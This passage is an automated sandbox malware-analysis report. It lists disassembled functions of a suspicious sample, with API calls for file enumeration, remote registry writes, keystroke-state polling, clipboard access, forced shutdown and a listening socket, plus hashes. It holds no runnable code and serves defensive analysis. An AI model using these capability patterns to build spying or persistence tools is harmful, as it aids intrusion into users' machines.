                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                        • API String ID: 3953360268-2428617273
                                                        • Opcode ID: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                        • Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
                                                        • Opcode Fuzzy Hash: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                        • Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66
                                                        Function 0046EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046EFB6
                                                        • _wcscmp.LIBCMT ref: 0046EFCB
                                                        • _wcscmp.LIBCMT ref: 0046EFE2
                                                        • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                                                        • FindClose.KERNEL32(00000000), ref: 0046F031
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                                                        • _wcscmp.LIBCMT ref: 0046F074
                                                        • _wcscmp.LIBCMT ref: 0046F08B
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                                                        • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                                                        • FindClose.KERNEL32(00000000), ref: 0046F0D2
                                                        • FindClose.KERNEL32(00000000), ref: 0046F0E4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1803514871-438819550
                                                        • Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                        • Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
                                                        • Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                        • Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E
                                                        Function 00480857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                                                        • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectCreateRegistryValue
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 536824911-966354055
                                                        • Opcode ID: 5b4aa97b492db371f5b262f2bb6d028803485e81deb917c00da9c6b1dd1dfccf
                                                        • Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
                                                        • Opcode Fuzzy Hash: 5b4aa97b492db371f5b262f2bb6d028803485e81deb917c00da9c6b1dd1dfccf
                                                        • Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89
                                                        Function 004166E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                                                        • API String ID: 0-559809668
                                                        • Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                        • Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
                                                        • Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                        • Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98
                                                        Function 0046F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046F113
                                                        • _wcscmp.LIBCMT ref: 0046F128
                                                        • _wcscmp.LIBCMT ref: 0046F13F
                                                          • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                                                        • FindClose.KERNEL32(00000000), ref: 0046F179
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                                                        • _wcscmp.LIBCMT ref: 0046F1BC
                                                        • _wcscmp.LIBCMT ref: 0046F1D3
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                                                        • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                                                        • FindClose.KERNEL32(00000000), ref: 0046F21A
                                                        • FindClose.KERNEL32(00000000), ref: 0046F22C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 1824444939-438819550
                                                        • Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                        • Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
                                                        • Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                        • Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D
                                                        Function 0046A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                                                        • __swprintf.LIBCMT ref: 0046A231
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                                                        • _memset.LIBCMT ref: 0046A2B2
                                                        • _wcsncpy.LIBCMT ref: 0046A2EE
                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                                                        • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                                                        • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                                                        • CloseHandle.KERNEL32(00000000), ref: 0046A341
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 2733774712-3457252023
                                                        • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                        • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                                                        • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                        • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
                                                        Function 0046001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00460097
                                                        • SetKeyboardState.USER32(?), ref: 00460102
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                                                        • GetKeyState.USER32(000000A0), ref: 00460139
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                                                        • GetKeyState.USER32(000000A1), ref: 00460179
                                                        • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                                                        • GetKeyState.USER32(00000011), ref: 004601B3
                                                        • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                                                        • GetKeyState.USER32(00000012), ref: 004601EA
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                                                        • GetKeyState.USER32(0000005B), ref: 00460221
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                        • Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
                                                        • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                        • Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
                                                        Function 004803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0048082F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1240663315-0
                                                        • Opcode ID: ff6242e509249e2b93cc6a9529d4c0709292e42bb850a8eecd1f0fa66da35eee
                                                        • Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
                                                        • Opcode Fuzzy Hash: ff6242e509249e2b93cc6a9529d4c0709292e42bb850a8eecd1f0fa66da35eee
                                                        • Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
                                                        Function 00474164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                        • Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
                                                        • Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                        • Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D
                                                        Function 0046F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
                                                        • Sleep.KERNEL32(0000000A), ref: 0046F470
                                                        • _wcscmp.LIBCMT ref: 0046F484
                                                        • _wcscmp.LIBCMT ref: 0046F49F
                                                        • FindNextFileW.KERNEL32(?,?), ref: 0046F53D
                                                        • FindClose.KERNEL32(00000000), ref: 0046F553
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                        • String ID: *.*
                                                        • API String ID: 713712311-438819550
                                                        • Opcode ID: 92a288f11230d480a522b0c0f936cc6b9b9cd0aeee01b41ae93ea83b3e82efad
                                                        • Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
                                                        • Opcode Fuzzy Hash: 92a288f11230d480a522b0c0f936cc6b9b9cd0aeee01b41ae93ea83b3e82efad
                                                        • Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59
                                                        Function 00413030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __itow__swprintf
                                                        • String ID: 3cA$_A
                                                        • API String ID: 674341424-3480954128
                                                        • Opcode ID: 1e684558f03312bb52afcfb7bee4740275ae5e0db51e4f3ae7f1dcda7164c3be
                                                        • Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
                                                        • Opcode Fuzzy Hash: 1e684558f03312bb52afcfb7bee4740275ae5e0db51e4f3ae7f1dcda7164c3be
                                                        • Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B
                                                        Function 004651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                          • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                          • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 004651F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                        • String ID: $@$SeShutdownPrivilege
                                                        • API String ID: 2234035333-194228
                                                        • Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                        • Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
                                                        • Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                        • Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F
                                                        Function 00476283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004762EB
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00476307
                                                        • listen.WSOCK32(00000000,00000005), ref: 00476316
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476330
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00476344
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                        • String ID:
                                                        • API String ID: 1279440585-0
                                                        • Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                                        • Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
                                                        • Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                                        • Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59
                                                        Function 00415520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                        • _memmove.LIBCMT ref: 00450258
                                                        • _memmove.LIBCMT ref: 0045036D
                                                        • _memmove.LIBCMT ref: 00450414
